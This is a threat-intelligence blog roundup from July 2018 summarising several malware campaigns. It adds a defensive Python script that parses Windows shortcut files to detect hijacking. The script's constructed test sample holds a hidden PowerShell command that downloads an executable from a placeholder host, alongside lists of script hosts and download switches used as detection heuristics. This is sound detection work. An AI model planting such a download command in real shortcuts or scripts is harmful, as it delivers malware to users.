Threat Exchange Network blog: July 2018

The Blueliv Threat Exchange Network is a global community of thousands of cybersecurity experts, IT professionals and academics. Each month members publish the latest news, threat data, IOCs and more in order to improve resilience and accelerate incident response. Members can create their own intelligence feeds for free by exporting these IOCs via our API and numerous SIEM plugins.

The fight against cybercrime is a collaborative effort. Here you’ll find some of the top posts from our Threat Exchange Network over the past month.

Join for free today – in addition to fresh intelligence, members also have access to our automated elastic sandbox and real-time cyberthreat map, including details on active crime servers.

A deep dive down the Vermin RAThole

An ongoing campaign to systematically spy on Ukrainian government institutions and exfiltrate data has been detected and analyzed by researchers. They identified three different strains of .NET malware: Quasar RAT, Sobaken RAT and a custom-made RAT called Vermin. [174 IOCs]

APT27 malware code uncovered

Analysts have been working through the contents of an open repository containing several Android applications, including a piece of Android spyware developed to exfiltrate sensitive information. The researchers determined that it was part of the arsenal of APT27, a Chinese group also known as the Golden Rat Organization. The group uses both Windows and Android malware to compromise target devices, and its activity is still ongoing. [93 IOCs]

Malicious Macro hijacks desktop shortcuts to deliver backdoor

Malicious macros are still delivering malware, albeit in more creative ways than in the past. A recently identified sample searches the user's system for specific shortcut files and replaces each one with a shortcut that points to a malware downloader. When the shortcut is clicked, the downloader executes and then restores the original shortcut so that the expected application opens. Researchers found that the malware 'assembles' its payload by downloading common tools, which gather information from the host and send it back via SMTP. [45 IOCs]
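The check a defender would want after reading that summary is a sweep of the shortcuts on the desktop and in the Start menu for ones that no longer point at the application they are named after. The script below is an added example for this post, not code from the original researchers or from Blueliv: it parses the on-disk Shell Link (.lnk) layout documented in MS-SHLLINK to recover the target path and command-line arguments, then flags shortcuts that launch a script host (PowerShell, cmd, wscript and similar) or carry a download one-liner. The builder, the file paths, the placeholder URL and the heuristic lists are all constructed for the example.

```python
import struct

# Added example (not code from the original post or from the researchers it
# summarises). It parses the on-disk Shell Link (.lnk) layout from MS-SHLLINK
# and flags shortcuts whose target is a script host or whose arguments carry a
# download. The builder, the paths and the URL below are constructed test data.

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # 00021401-0000-0000-C000-000000000046
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, IS_UNICODE = 0x10, 0x20, 0x80

# Heuristics (an assumption for this example; tune them to your environment).
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
DOWNLOAD_MARKERS = ("http://", "https://", "downloadstring", "downloadfile",
                    "invoke-webrequest", "-enc", "-encodedcommand", "urlcache", "/transfer")


def build_lnk(local_base_path: str, relative_path: str, arguments: str) -> bytes:
    """Build a minimal .lnk: header, LinkInfo with a local base path, then StringData."""
    flags = HAS_LINK_INFO | HAS_REL_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)       # times, size, icon, SW_SHOWNORMAL, ...
    vol = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"   # VolumeID: fixed drive, empty label
    lbp = local_base_path.encode("ascii") + b"\x00"           # LocalBasePath, NUL-terminated
    body = vol + lbp + b"\x00"                                # + empty CommonPathSuffix
    link_info = struct.pack("<IIIIIII", 28 + len(body), 28, 1, 28, 28 + len(vol), 0,
                            28 + len(vol) + len(lbp)) + body

    def string_data(s: str) -> bytes:                         # CountCharacters + UTF-16LE text
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + link_info + string_data(relative_path) + string_data(arguments)


def parse_lnk(data: bytes) -> dict:
    """Extract the resolved target and the StringData fields from a .lnk blob."""
    if data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76                                                  # ShellLinkHeader is fixed-size
    if flags & HAS_ID_LIST:                                   # skip LinkTargetIDList if present
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    target = None
    if flags & HAS_LINK_INFO:
        size, _hdr, li_flags, _vol_off, lbp_off = struct.unpack_from("<IIIII", data, pos)
        if li_flags & 1:                                      # VolumeIDAndLocalBasePath
            end = data.index(b"\x00", pos + lbp_off)
            target = data[pos + lbp_off:end].decode("latin-1")
        pos += size

    def read_string() -> str:
        nonlocal pos
        n = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        raw = data[pos:pos + (2 * n if flags & IS_UNICODE else n)]
        pos += len(raw)
        return raw.decode("utf-16-le" if flags & IS_UNICODE else "latin-1")

    out = {"target": target, "name": None, "relative_path": None,
           "working_dir": None, "arguments": ""}
    for flag, key in ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments")):
        if flags & flag:
            out[key] = read_string()
    return out


def triage_shortcut(data: bytes) -> list:
    """Return the reasons a shortcut looks hijacked; an empty list means nothing suspicious."""
    lnk = parse_lnk(data)
    path = (lnk["target"] or lnk["relative_path"] or "").replace("/", "\\")
    exe = path.rsplit("\\", 1)[-1].lower()
    args = lnk["arguments"]
    reasons = []
    if exe in SCRIPT_HOSTS:
        reasons.append(f"launches a script host rather than an application: {exe}")
    if any(m in args.lower() for m in DOWNLOAD_MARKERS):
        reasons.append("arguments contain a URL or a download/encoded-command switch")
    if len(args) > 200:
        reasons.append(f"unusually long argument string ({len(args)} chars)")
    return reasons


# Constructed samples: a normal browser shortcut and the same shortcut repointed
# at PowerShell with a download one-liner (placeholder URL, not a real IOC).
BENIGN = build_lnk(r"C:\Program Files\Mozilla Firefox\firefox.exe",
                   r"..\..\Program Files\Mozilla Firefox\firefox.exe", "")
HIJACKED = build_lnk(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                     r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                     "-w hidden -c \"(New-Object Net.WebClient).DownloadFile("
                     "'http://example.invalid/a.exe', $env:TEMP + '\\a.exe')\"")

if __name__ == "__main__":
    for name, blob in (("firefox.lnk", BENIGN), ("firefox.lnk (hijacked)", HIJACKED)):
        print(name, "->", triage_shortcut(blob) or ["clean"])
```

On a real host, feed `triage_shortcut()` the bytes of each `.lnk` under the user's Desktop and `%APPDATA%\Microsoft\Windows\Start Menu`; the parser deliberately skips the LinkTargetIDList rather than resolving it, so a shortcut that stores its target only in the ID list (no LinkInfo and no relative path) will come back with an empty target and should be reviewed by hand rather than assumed clean.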

New version of Kronos banking trojan discovered

At least three new campaigns spreading a revamped version of Kronos have been identified. The malware's heyday was back in 2014, yet researchers have seen users of German, Japanese and Polish banks being targeted this year. Around the time the new variant began to appear, a trojan called Osiris was advertised on hacking forums, possibly the new name for Kronos in 2018. [22 IOCs]

Our community is growing daily – become a member for free and earn recognition for your contributions to the Network.

Read our free cyber security and cyber threat reports
